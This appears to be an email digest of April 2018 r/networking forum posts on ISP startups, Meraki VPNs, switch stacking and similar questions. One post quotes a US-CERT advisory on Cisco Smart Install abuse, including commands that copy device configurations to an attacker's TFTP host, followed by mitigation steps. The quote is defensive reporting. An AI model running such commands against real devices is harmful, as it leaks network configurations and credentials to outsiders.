Creating a new ISP company Networking |
- Creating a new ISP company
- Moronic Monday!
- Why are Quantum (Editshare, SNS, et al...) NAS products so expensive?
- Meraki - problem with IPsec through MX device
- What am I doing wrong adding this new switch to the stack?
- Any particular site that is user friendly for learning networking?
- Pulse Secure Client for Windows insecurity
- Meraki - Good idea? Bad idea?
- Installing FirePOWER while Active/Standby Failover is running
- Trying to diagnose a drop in internet speed for computers not connected directly to my router.
- Smart Install MS-ISAC Notice
- How will a dualport Mellanox 100Gbe NIC behave in a single PCIe 3.0 16x slot?
- Tell me about THE worst day/week you ever had in your career, and why it still gives you nightmares?
- Split Tunnel: DNS Protection Options?
- Cox Fiber question
- Redesign of multi-site ring with NSX
- Looking to decorate work space. Post your best Networking meme's!
- Most Valuable Research Topic
- Cisco MESH help
- Packet Tracer download
- 2 inside NAT interfaces with 2 outside interfaces
- Avocent Cyclades 6048 unable to login
- DHCP Helper and DHCP Server on same VLAN. Who wins?
Posted: 16 Apr 2018 10:27 AM PDT Hello friends, I'm certain this has been discussed many times over as I've seen a small handful of other posts regarding this matter. However, given the circumstances and access to funds, it is within my capacity to bring a new ISP to a rural area of which I live in. Which currently only offers two other ISP's that are atrocious and the area is in desperate need of a new solution. No data caps, better pricing, better speeds and just overall a better network. The purpose of this post is really to attain the following:
The idea is to run fiber directly to the home. And for the super rural areas, the plan is to implement a WISP network to cut down on fiber costs. Any insight from anyone experienced in this field is incredibly appreciated. My town needs this help... And I want to provide that to them. TLDR: How to get started building a new ISP in small rural town. Fiber costs? Project costs? Red tape? [link] [comments] |
Posted: 16 Apr 2018 05:12 AM PDT It's Monday, you've not yet had coffee and the week ahead is gonna suck. Lets open the floor for a weekly Stupid Questions Thread, so we can all ask those questions we're too embarassed to ask! Post your question - stupid or otherwise - here to get an answer. Anyone can post a question and the community as a whole is invited and encouraged to provide an answer. Serious answers are not expected. [link] [comments] |
Why are Quantum (Editshare, SNS, et al...) NAS products so expensive? Posted: 16 Apr 2018 06:00 AM PDT Okeydoke, I work for the small video production arm of a larger organisation. We are a mix of Macs and PCs, we're growing, we're messy, and we're about to upgrade our network infrastructure (only my team, not the wider organisation). I've been discussing some typical workload scenarios with our IT contractors, and based on this we've created a solution based around a Synology RS3617xs. The proposed solution looks as though it will perform all the tasks required of it, and give us the performance we need (including two workstations editing 4K directly from the NAS over 10GbE). Great. However, I'm aware of video specific networking products from companies like Quantum, companies with "entry level" solutions that start at about 5x the cost of our current Synology-based proposal (we're at around $15k, Quantum's Xcellis Foundation would be around $70k). Such products are pitched at teams of around our size and workload, but they come at a significant premium. Why? I've been trying to read up on the benefits of this premium kit, but while I (hopefully) understand the USPs being advertised, I'm struggling to see the 5-6x value that arises from the 5-6x cost. Ultimately, I think we'll pursue the Synology solution, benefit hugely, and that will be that (partly because we don't have the budget for more expensive infrastructure). Perhaps my inability to better appreciate the value of video specific networking products suggests that I am not in the market for them. That said, I do have purchasing decisions to make and I am keen for them to be educated. I hope this qualifies as a relevant question. I've deliberately avoid talk of team sizes and typical video bitrate in an attempt to minimize reading tedium. Ta in advance, [link] [comments] |
Meraki - problem with IPsec through MX device Posted: 16 Apr 2018 03:08 PM PDT Hello All, We have a problem with Cisco Meraki MX. The Meraki appliance should replace current firewall which is deployed at customer. Almost everything is doing well, but there is an ASA behind the Meraki (in DMZ Section), which is doing site to site to another location (ASA and remote peer is not managed by us). For the DMZ section the MX appliance is doint 1:1 NAT for every Public IP. The devices which are there situated are accessible from the Internet. So the NAT is going well. BUT ... When the ASA is trying to establish through the MX IPsec, the tunnel it is not working, According to the 3rd party the Phase 1 is UP but there is problem with Phase2. The MX is in NAT mode According to the manual, 1:1 NAT is configured, Nat-t are confirmed that are enabled on both of the ASA. https://documentation.meraki.com/MX-Z/Other_Topics/Using_VPN_through_an_MX_Security_Appliance Did you also had problem with this setup ? Thank you in advance Sorry for my bad english Drawing for simplification: [link] [comments] |
What am I doing wrong adding this new switch to the stack? Posted: 16 Apr 2018 02:50 PM PDT Okay I've stacked a ton of Cisco switches, though I've technically never just thrown a new switch into an existing stack. I've got a site that had an extra switch they wanted to add into their existing stack of 3750X switches. It already had a previous config, but from my knowledge and everything I thought I interpreted reading on that, you should be able to throw that on there and the current master should just default it, as long as I didn't lose power to the stack or something.
However, when I did this, it decided to take over master, wipe the config and give the stack its own previous configuration. I figured, yeah I'm being sort of lazy I should have done it right. So I got things back to normal, had the customer remove the switch, wipe it, set priority. Connected it again, bam takes the stack down again and wipes them. How is it taking over this stack every time? [link] [comments] |
Any particular site that is user friendly for learning networking? Posted: 16 Apr 2018 02:35 PM PDT I'm trying to find a site that has write ups for networking concepts, protocols, troubleshooting recommendations etc. I do like Cisco and junipers documentation but they can be cryptic and can sometimes have too much information. Youtube channel will work as well. I do like INE but it's hard to find exactly which video to watch based off my particular questions. Any suggestions are helpful. Thanks [link] [comments] |
Pulse Secure Client for Windows insecurity Posted: 16 Apr 2018 02:33 PM PDT We are constantly having problem with the Pulse Secure VPN client asking for passwords in a login window that LOOKS like it is modal, but in fact is not. The cause problems where the password can end up anywhere even if the Pulse Secure login window is the frontmost window and the password text field has focus. This is especially bad if the password ends up in something like a chat window instead. This is of course extremely poor design by Pulse Secure but unfortunately, they seems to be completely uninterested in fixing this. Anything we can do on our side to avoid these problems? This is how the supposed-to-be modal Window looks like and the problem with it [link] [comments] |
Posted: 16 Apr 2018 10:15 AM PDT Has anyone here used them and if so, have you encountered a situation in which the Meraki hardware couldn't do something that you could have gotten from a regular Cisco device? I'm not too worried about the licensing vs one-time-buy decision, this is purely about the technical capabilities. EDIT: Based on the responses I realize that I need to provide more detail.
Basically, the company has a large network without anyone with the knowledge to properly manage it. And from what I'm gathering, they won't ever get the 'OKAY' to pay what a true network engineer would cost. At most they'll hire a CCNA level. With that in mind, I was thinking Meraki purely for the ease of management. [link] [comments] |
Installing FirePOWER while Active/Standby Failover is running Posted: 16 Apr 2018 06:09 AM PDT Hi all, Does anyone have any experience with installing FirePOWER while having Active/Standby Failover running? Is there anything special to consider or can one simply proceed as normal as per Cisco's installation guides? These are two 5525s in case it makes a difference. Nobody in my team has done anything with FirePOWER before so I'm turning to you guys. Thanks! [link] [comments] |
Trying to diagnose a drop in internet speed for computers not connected directly to my router. Posted: 16 Apr 2018 01:37 PM PDT [Solved] My office network has an internet connection which is approximately 80Mbps download. All computers connected directly to my router get approximately those speeds when I run a speed test. However, any computers which go through a hub to get to the internet will see a significant drop in speed to something like 20Mbps. All of the computes are connected via Cat6 cable, and the router and hub are all gigabit connections. The way I diagnosed this problem was by running a speed test on a computer connected to the hub as a benchmark. I then unplugged the cable from the router and the cable to the computer and connected them with a coupler (creating a direct link to the router). After doing this I ran another speed test on that computer and received nearly identical speeds to the other computers connected directly. One question I have is whether it is normal to see speeds throttled like this after a hub, or if this indicates a problem with the equipment. Due to the layout of the building it would be very difficult to have a direct connection of the router for all computers, so the use of hubs is necessary. [link] [comments] |
Posted: 16 Apr 2018 01:23 PM PDT I was reading notice from MS-ISAC . - https://www.us-cert.gov/ncas/alerts/TA18-106A Then I laughed when I saw this https://imgur.com/a/YWzU4 The specific mention of the Cisco mart Install vulnerability. I always found it odd to see this exploit mentioned as a misuse by Cisco in 2017. I almost never seen that label before. Then to read that the tools to run this exploit was found in November of 2016. It's really shocking to see that this big exploit was out there and Cisco officially announced it in March. I understand that ACLs can prevent this exploit, but like the notice mentions it is on the ISP and service equipment that can still have this exploit. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170214-smi Then it was marked as a vulnerability in 2018. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2 A good read about the vulnerability last year. "Between June 29 and July 6, 2017, Russian actors used the Cisco Smart Install protocol to scan for vulnerable network devices. Two Russian cyber actor-controlled hosts, 91.207.57.69(3) and 176.223.111.160(4), connected to IPs on several network ranges on port 4786 and sent the following two commands: copy nvram:startup-config flash:/config.text copy nvram:startup-config tftp://[actor address]/[actor filename].conf In early July 2017, the commands sent to targets changed slightly, copying the running configuration file instead of the startup configuration file. Additionally, the second command copies the file saved to flash memory instead of directly copying the configuration file. copy system:running-config flash:/config.text copy flash:/config.text tftp://[ actor address]/[actor filename].conf" A nice write up how to mitigate. Of course there's patching. "How to Mitigate SMI Abuse Configure network devices before installing onto a network exposed to the Internet. If SMI must be used during installation, disable SMI with the "no vstack" command before placing the device into operation. Prohibit remote devices attempting to cross a network boundary over TCP port 4786 via SMI. Prohibit outbound network traffic to external devices over UDP port 69 via TFTP. See Cisco recommendations for detecting and mitigating SMI. [10] Cisco IOS runs in a variety of network devices under other labels, such as Linksys and SOHO Internet Gateway routers or firewalls as part of an Internet package by ISPs (e.g., Comcast). Check with your ISP and ensure that they have disabled SMI before or at the time of installation, or obtain instructions on how to disable it." [link] [comments] |
How will a dualport Mellanox 100Gbe NIC behave in a single PCIe 3.0 16x slot? Posted: 16 Apr 2018 02:42 AM PDT I want to buy a Mellanox Connectx-5 NIC with two 100Gbe ports. However, the max throughput of a PCIe 3.0 16x slot is only 126Gbps.
I've read the card's user manual but there is no mention of this, so I'm asking here. Thank you in advance. [link] [comments] |
Tell me about THE worst day/week you ever had in your career, and why it still gives you nightmares? Posted: 15 Apr 2018 06:51 PM PDT Was it users being complete dumbasses? Your bosses completely fucking over your network, making work ten times harder? Terrible coworkers? An abrut change in policy by people who have no fucking idea what you do day-to-day? Let's hear it all! Worst of the worst. [link] [comments] |
Split Tunnel: DNS Protection Options? Posted: 16 Apr 2018 12:31 PM PDT Currently we are utilizing F5 Edge Client for SSL VPN. For the longest time we were full tunneling, but our VP eventually forced our hands to go split-tunnel (I know all the security risks, yes, I know full is better but that isn't a discussion). On our F5, I have it enabled to not allow local DNS servers so it forces it through our Infoblox DNS. Our management, however, wants to add another layer of security. I know really basic knowledge about Umbrella and Infoblox having DNS threat protection. I am curious for those who are using those products or similar on how they are handling it and what products? Our primary requirement is that no matter where they are connected, they are always using our DNS for resolution and not Google or whatever. We know some products you have to install a client locally on the machine. We want to make sure we have a product that locks it down and some smart developer or googler can't find a way to disable it. We currently use Checkpoint, but are wanting to move to Palo Alto and prefer it. I hate Cisco ASAs/Firepower with a furry powered by 1000 suns and the word Anyconnect was brought up and I shuttered. However, I am trying to keep an open mind and willing to hear the pros and cons of it. Just curious to see what people are using today, how you are using it and what has and hasn't worked. [link] [comments] |
Posted: 16 Apr 2018 12:12 PM PDT More of a curiosity than really a question. So we had a dedicated fiber link into our admin building for our school district. At one point it was decided to move the head end to a different building in case this one turns back into classrooms. So the circuit at our office is essientially dead to us. Today power was moved from that old equipment. Cox called within an hour because they couldnt reach that equipment and it was taking down someone else. Why was someone elses circuit being routed through our building? Just seems counter productive to do it that way? Dont know much about carrier grade stuff though. Cox guy came and jumpered in the fiber patch box on the rack. [link] [comments] |
Redesign of multi-site ring with NSX Posted: 16 Apr 2018 12:11 PM PDT We're about to implement NSX and I am using the opportunity to re-work our networks and routing. I'm a little reluctant to ask this because it seems pretty basic, but I'm primarily a server guy and this is a bit out of my comfort zone. Scenario: We have three main sites that form a ring. All three sites have various user subnets, but sites A and B also contain datacenters with VMware hosts.
All Sites:
Sites A and B:
Virtual Infrastructure:
Questions:
Thanks! [link] [comments] |
Looking to decorate work space. Post your best Networking meme's! Posted: 16 Apr 2018 03:36 PM PDT |
Posted: 16 Apr 2018 10:14 AM PDT I am a college senior and I have to do a 20 minute presentation on one of the following topics. Which of these do you think would be the most valuable to have a deeper understanding of in the networking field? Dynamic DNS [link] [comments] |
Posted: 16 Apr 2018 09:33 AM PDT Jr. Network Engineer here. I've been tasked with a massive list of PLC devices and have to find what switch each is connected to. I was only given the IPs of the PLC devices and then got their MAC addresses from our Firewall. Next I went to our core switches and ran the MAC's in there and am literally tracing them out through cdp neighbor from there. All is fine until I hit our MESH radios. Where do I go from here? Here's an example. Core Switch -> 'x' switch -> ie2000 switch -> Cisco 1552 RAP Can I find a list of all the MAC's passing through that radio on our WLC? Or how should I proceed? Thanks in advance for any help. [link] [comments] |
Posted: 16 Apr 2018 08:47 AM PDT Hello Does anyone know where I can download packet Tracer from for free without the student login? [link] [comments] |
2 inside NAT interfaces with 2 outside interfaces Posted: 16 Apr 2018 07:07 AM PDT I have 2 internet connections coming into my router, one is the primary connection and the other is a failover connection. Currently I have my primary connection plugged into to ge0/1 and my ip nat inside source list interface is ge0/1. When the primary connection goes down the failover automatically routes traffic across my vpn but internet traffic is lost. Is there a way to set 2 inside nat source lists or a way to configure some kind of dynamic nat? Thanks. [link] [comments] |
Avocent Cyclades 6048 unable to login Posted: 16 Apr 2018 12:36 AM PDT Hi Guys, I have an ACS 6048 terminal server which was working fine. Strangely I noticed today that I am not able to login into ACS, however I can login to other switches consoles fine. Login error while connecting to ACS via CLI: Error: Failed to connect to UIC, system error description! [Error - 111: Connection refused] Tried searching on web but didn't found any answers or what does this UIC error mean. Did somebody faced such issues or have some solution please? [link] [comments] |
DHCP Helper and DHCP Server on same VLAN. Who wins? Posted: 16 Apr 2018 05:15 AM PDT Is it a case of who responds first? Or will the DHCP Helper intercept and forward all DHCP requests to the DHCP Server specified by the DHCP Helper? [link] [comments] |
You are subscribed to email updates from Enterprise Networking news, blogs and discussion.. To stop receiving these emails, you may unsubscribe now. | Email delivery powered by Google |
Google, 1600 Amphitheatre Parkway, Mountain View, CA 94043, United States |
No comments:
Post a Comment